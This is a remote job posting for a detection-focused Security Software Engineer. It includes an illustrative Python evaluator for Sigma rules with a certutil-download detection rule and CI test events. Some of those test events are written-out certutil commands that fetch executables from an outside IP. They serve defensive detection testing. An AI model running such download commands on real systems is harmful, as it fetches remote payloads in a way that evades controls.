Security Software Engineer

United States - Remote

Stellar Cyber

Next Gen SIEM Security - Stellar Cyber delivers NG-SecOps, Next Gen SIEM, Network Detection and Response, EDR platform along with SIEM security tools.


Stellar Cyber is a fast-growing cybersecurity company focused on delivering holistic cyberattack protection to organizations while significantly reducing total cost of ownership with its innovative Open XDR (eXtended Detection and Response) platform, based on advanced ML and security technologies. Stellar Cyber has been recognized by Gartner as one of the leading XDR players.

To accelerate our growth, we are seeking a talented Sr./Staff Security Engineer specializing in detection to join our cybersecurity team: someone with startup passion, a can-do attitude, and a desire to make an impact while building a future for themselves and for Stellar Cyber. If you are excited to be part of a very fast-growing team with lots of opportunities, Stellar Cyber is a great place to grow your career.

Position Overview

We are looking for a highly skilled and motivated Security Software Engineer, specializing in developing security software features, to join our cybersecurity team. As a Security Software Engineer, you will play a crucial role in developing and maintaining the out-of-the-box detection rules and the detection framework shipped with Stellar Cyber’s Open XDR platform, so that the platform achieves best-in-class detection coverage.

Responsibilities

  1. Research and author detection rules in Sigma format. Your top responsibility will be to create out-of-the-box detection rules for Stellar Cyber’s Open XDR platform. These rules will cover areas where coverage is needed, such as endpoints (e.g., Windows, Linux), cloud (e.g., AWS, Azure), SaaS (e.g., Microsoft 365, Google Workspace), and network (e.g., DNS metadata).
  2. Manage and build detection use cases for out-of-the-box detection rules. You will be responsible for organizing detection rules into carefully designed use cases (e.g., with alert types, TTP mappings, informative alert descriptions, etc.) that help Stellar Cyber’s customers understand and act on rule-triggered alerts effectively.
  3. Design, develop, and maintain Stellar Cyber’s rule detection framework. You will be responsible for continuously improving the detection framework that runs the detection rules, for example by supporting more of the Sigma rule syntax.
  4. Design, develop, and maintain automation and the appropriate CI/CD pipelines for detection rule development, testing, and deployment, plus any other management features needed to work efficiently with a large number of rules.
  5. Continuously evaluate, monitor, and tune the accuracy and efficacy of detection rules. You will be responsible for periodically checking and evaluating the accuracy and efficacy of the detection rules deployed to Stellar Cyber’s customers, and for tuning noisy rules where necessary.
  6. Collaborate with the Product and Engineering teams to release detection rules and detection use cases. Releasing rules is an involved process with multiple considerations, including customer needs, the product roadmap, and engineering feasibility. You will work closely with Product Management, Engineering, and high-value customers to ensure a smooth release process.
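To make responsibilities 1, 3, 4 and 5 concrete, here is an added example of what a small detection framework for Sigma rules looks like: a rule in Sigma's field/modifier/condition form, an evaluator for a subset of the Sigma syntax (case-insensitive matching, `*`/`?` wildcards, the `contains`/`startswith`/`endswith`/`all` modifiers, and boolean conditions with `and`/`or`/`not` and parentheses), ATT&CK technique tagging for the resulting alerts, and the positive/negative self-test a rule CI job would run before deploying. This is illustrative code written for this page, not Stellar Cyber's framework or rule set; the rule, the `approved_installer.exe` filter, and all events are constructed.

```python
import re

# Constructed Sigma rule, shown as the dict a YAML parser yields for the rule file. It
# fires on certutil.exe fetching a URL (a common LOLBin download, ATT&CK T1105) unless
# the parent process is a hypothetical allowlisted installer (the "filter" block).
RULE = {
    "title": "Certutil Download",
    "tags": ["attack.command_and_control", "attack.t1105"],
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {"Image|endswith": "\\certutil.exe",
                      "CommandLine|contains|all": ["-urlcache", "http"]},
        "filter": {"ParentImage|endswith": "\\approved_installer.exe"},
        "condition": "selection and not filter",
    },
    "level": "high",
}

def value_matches(pattern, value, mods: list[str]) -> bool:
    """One Sigma value against one event field: case-insensitive, '*' and '?' wildcards."""
    if value is None:                       # a field absent from the event never matches
        return False
    pat = str(pattern).lower()
    if "contains" in mods:
        pat = f"*{pat}*"
    elif "startswith" in mods:
        pat = f"{pat}*"
    elif "endswith" in mods:
        pat = f"*{pat}"
    regex = "".join(".*" if c == "*" else "." if c == "?" else re.escape(c) for c in pat)
    return re.fullmatch(regex, str(value).lower(), re.DOTALL) is not None

def selection_matches(selection, event: dict) -> bool:
    """A map is AND over its fields; a list of maps is OR over the maps."""
    if isinstance(selection, list):
        return any(selection_matches(s, event) for s in selection)
    for key, patterns in selection.items():
        field, *mods = key.split("|")
        pats = patterns if isinstance(patterns, list) else [patterns]
        quant = all if "all" in mods else any   # a list of values is OR unless |all
        if not quant(value_matches(p, event.get(field), mods) for p in pats):
            return False
    return True

def eval_condition(cond: str, results: dict[str, bool]) -> bool:
    """'a and (b or not c)' by precedence climbing; syntax outside this subset
    (e.g. '1 of selection*', aggregations) raises instead of silently matching."""
    tokens = re.findall(r"\(|\)|\w+", cond)
    def atom(i: int) -> tuple[bool, int]:
        tok = tokens[i] if i < len(tokens) else ""
        if tok == "not":
            v, i = atom(i + 1)
            return (not v), i
        if tok == "(":
            v, i = expr(i + 1, 0)
            if i >= len(tokens) or tokens[i] != ")":
                raise ValueError(f"unbalanced parentheses in {cond!r}")
            return v, i + 1
        if tok not in results:
            raise ValueError(f"unsupported condition token {tok!r} in {cond!r}")
        return results[tok], i + 1
    def expr(i: int, min_prec: int) -> tuple[bool, int]:   # precedence: or=0 < and=1
        v, i = atom(i)
        while i < len(tokens) and tokens[i] in ("and", "or") and (tokens[i] == "and") >= min_prec:
            op = tokens[i]
            rhs, i = expr(i + 1, (op == "and") + 1)
            v = (v and rhs) if op == "and" else (v or rhs)
        return v, i
    v, i = expr(0, 0)
    if i != len(tokens):
        raise ValueError(f"trailing tokens in {cond!r}: {tokens[i:]}")
    return v

def rule_matches(rule: dict, event: dict) -> bool:
    det = rule["detection"]
    named = {n: selection_matches(s, event) for n, s in det.items() if n != "condition"}
    return eval_condition(det["condition"], named)

def run_rule(rule: dict, events: list[dict]) -> list[dict]:
    """Alerts tagged with the ATT&CK technique IDs taken from the rule's tags."""
    ttps = [t[7:].upper() for t in rule.get("tags", []) if re.fullmatch(r"attack\.t\d{4}(\.\d{3})?", t)]
    return [{"title": rule["title"], "level": rule["level"], "techniques": ttps, "event": e}
            for e in events if rule_matches(rule, e)]

def check_rule(rule: dict, should_fire: list[dict], should_not_fire: list[dict]) -> list[str]:
    """CI gate: a rule ships with sample events it must and must not fire on."""
    return ([f"missed: {e['CommandLine']}" for e in should_fire if not rule_matches(rule, e)]
            + [f"false positive: {e['CommandLine']}" for e in should_not_fire if rule_matches(rule, e)])

def _ev(image: str, parent: str, cmd: str) -> dict:   # constructed event, not real telemetry
    return {"Image": "C:\\Windows\\System32\\" + image, "ParentImage": parent, "CommandLine": cmd}
POSITIVE = [
    _ev("certutil.exe", "C:\\Windows\\System32\\cmd.exe",
        "certutil.exe -urlcache -split -f http://203.0.113.5/a.exe a.exe"),
    _ev("CERTUTIL.EXE", "C:\\Windows\\System32\\powershell.exe",   # case must not matter
        "CERTUTIL -URLCACHE -f HTTP://203.0.113.5/b.txt b.txt"),
]
NEGATIVE = [
    _ev("certutil.exe", "C:\\Program Files\\approved_installer.exe",   # suppressed by filter
        "certutil.exe -urlcache -split -f http://203.0.113.5/c.msi c.msi"),
    _ev("certutil.exe", "C:\\Windows\\System32\\cmd.exe", "certutil -hashfile a.exe SHA256"),
    _ev("notepad.exe", "C:\\Windows\\System32\\explorer.exe", "notepad.exe a.txt"),
]
```

Running `check_rule(RULE, POSITIVE, NEGATIVE)` returns an empty list, and `run_rule(RULE, POSITIVE + NEGATIVE)` yields two alerts, both mapped to T1105. Two design points matter for a framework that will host thousands of rules: a field missing from the event is a non-match rather than an error, so a rule never fires on a log source that lacks the field it keys on, and any condition syntax the evaluator does not implement raises instead of being ignored, which is what lets a CI pipeline catch a rule that silently matches everything or nothing before it reaches customers.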

Requirements

    1. Bachelor’s or Master’s degree in Computer Science or a related field of study; three or more years of experience in the security industry is preferred.
    2. Strong system design and problem-solving skills in designing and implementing microservices, language parsers and compilers, detection engines, etc.
    3. Three or more years of experience in Python, Java, or Go, with hands-on experience implementing sophisticated software systems in these languages.
    4. Experience with threat detection, detection tuning, and threat hunting in security operations settings (e.g., with a SIEM product).
    5. Experience using, managing, and developing Sigma rules, Splunk rules, Elastic rules, and Suricata rules or other IDS rules.
    6. Security knowledge of networking, operating systems (Windows and Linux), web servers, firewalls, proxies, and cloud services (e.g., Azure, AWS, OCI), and the ability to apply that knowledge to detection rule research and authoring.
    7. Knowledge of the MITRE ATT&CK framework, the Cyber Kill Chain, and the Unified Kill Chain, and the ability to apply that knowledge to designing detection use cases.
    8. Willingness and enthusiasm to keep up with new security trends and threats, as well as related technologies.
    9. Excellent communication skills, both written and verbal, with the ability to present complex ideas to both technical and non-technical stakeholders.

Benefits

We pride ourselves on recognizing our employees. Here are some examples of our benefits program:

• Pre-IPO Stock Options
• Medical, Dental & Vision care
• 401(k)
• Employee Assistance Program
• Employee Discount Program
• Life Insurance
• Paid time off
• Referral Program
• Rewards and Recognition Program

Tags: Automation AWS Azure CI/CD Cloud Compilers Computer Science Cyber Kill Chain DNS Firewalls Golang IDS Java Linux Microservices MITRE ATT&CK Python SaaS SIEM Splunk Windows XDR

Perks/benefits: Career development Equity Health care Startup environment

Regions: Remote/Anywhere North America
Country: United States